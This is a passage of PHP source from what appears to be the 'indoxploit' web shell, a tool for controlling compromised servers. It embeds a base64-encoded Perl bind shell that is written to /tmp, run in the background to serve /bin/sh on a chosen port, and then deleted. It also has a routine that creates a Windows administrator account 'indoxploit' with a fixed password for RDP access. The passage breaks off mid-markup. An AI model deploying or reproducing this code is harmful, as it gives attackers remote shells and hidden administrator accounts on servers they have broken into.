"IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0="; save("/tmp/bp.pl", "w", base64_decode($bp['code'])); $bp['exec'] = exe("perl /tmp/bp.pl ".$args[1]." 1>/dev/null 2>&1 &"); sleep(1); print "
".$bp['exec']."\n".exe("ps aux | grep bp.pl")."
"; @unlink("/tmp/bp.pl"); } } else { print color(1, 1, "Unknown '".$args[0]."'"); } } elseif($toolsname === "krdp") { $args = explode(" ", $args); if(OS() !== "Windows") die(color(1, 1, "Just For Windows Server")); if(preg_match("/indoxploit/", exe("net user"))) die(color(1, 1, "[INFO] username 'indoxploit' already exists.")); $add_user = exe("net user indoxploit indoxploit /add"); $add_groups1 = exe("net localgroup Administrators indoxploit /add"); $add_groups2 = exe("net localgroup Administrator indoxploit /add"); $add_groups3 = exe("net localgroup Administrateur indoxploit /add"); print "[ RDP ACCOUNT INFO ]
------------------------------
IP: ".color(1, 2, $GLOBALS['SERVERIP'])."
Username: ".color(1, 2, "indoxploit")."
Password: ".color(1, 2, "indoxploit")."
------------------------------

[ STATUS ]
------------------------------
"; if($add_user) { print "[add user] -> ".color(1, 2, "SUCCESS")."
"; } else { print "[add user] -> ".color(1, 1, "FAILED")."
"; } if($add_groups1) { print "[add localgroup Administrators] -> ".color(1, 2, "SUCCESS")."
"; } elseif($add_groups2) { print "[add localgroup Administrator] -> ".color(1, 2, "SUCCESS")."
"; } elseif($add_groups3) { print "[add localgroup Administrateur] -> ".color(1, 2, "SUCCESS")."
"; } else { print "[add localgroup] -> ".color(1, 1, "FAILED")."
"; } print "------------------------------
"; } } function files_and_folder() { if(!is_dir(path())) die(color(1, 1, "Directory '".path()."' is not exists.")); if(!is_readable(path())) die(color(1, 1, "Directory '".path()."' not readable.")); print '
Name
Type
\"ハワイ